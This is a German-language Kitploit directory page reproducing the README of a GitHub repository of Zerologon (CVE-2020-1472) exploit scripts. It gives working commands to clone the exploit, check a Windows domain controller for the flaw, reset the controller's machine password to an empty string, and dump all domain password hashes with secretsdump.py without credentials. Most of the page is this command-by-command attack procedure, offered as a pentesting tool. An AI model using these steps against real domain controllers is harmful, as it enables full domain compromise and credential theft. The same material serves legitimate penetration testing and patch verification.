Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/carlos55ml/zerologon
Privilege EscalationPasswortangriffeSchwachstellenanalyseExploitationLaterale BewegungPenetrationstests
GitHubcarlos55ml/zerologon

zerologon

Sammlung von Skripten, um die Zerologon-Schwachstelle (CVE-2020-1472) zu testen und auszunutzen.

Repository anzeigen
2vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Zerologon

Skriptsammlung zum Testen und Ausnutzen der Zerologon-Sicherheitslücke (CVE-2020-1472)


banner

Was ist das?

ZeroLogon ist eine Sicherheitslücke, die es uns ermöglicht, einen Kryptografiefehler im Microsoft Active Directory Netlogon Remote Protocol (MS-NRPC) auszunutzen, das Benutzern die Anmeldung an Servern mittels NTLM erlaubt.


Vorherige Schritte

Vor der Ausführung des Exploits müssen wir wissen, dass wir eine andere Version von Impacket benötigen. Dazu gehen wir wie folgt vor:

apt remove --purge impacket-scripts python3-impacket

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket

pip install .


PoC (Proof Of Concept)

git clone https://github.com/Nekoox/zerologon.git

cd zerologon

pip install -r requirements.txt

Überprüfen, ob der betroffene Domänencontroller anfällig für Zerologon ist.

python3 tester.py <DC-NAME> <ip-address>

Falls der betroffene Domänencontroller anfällig ist, erscheint eine Meldung mit dem Inhalt „Erfolg! Der DC kann durch einen Zerologon-Angriff vollständig kompromittiert werden."

Andernfalls, d.h. der betroffene DC ist nicht anfällig, da das Sicherheitsloch gepatcht wurde, erhalten wir folgende Meldung: „Angriff fehlgeschlagen. Ziel ist vermutlich gepatcht."


Das Passwort des anfälligen Domänencontrollers auf eine leere Zeichenkette ändern.

python3 empty_pw.py <DC-NAME> <ip-address>

Wenn der Domänencontroller anfällig ist, sollte er nach Ausführung des Exploits kein Passwort haben.

Hashes des Domänencontrollers dumpen.

> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>

Durch die Ausführung können wir alle Hashes der Domäne ohne Anmeldeinformationen sehen.

Tool herunterladen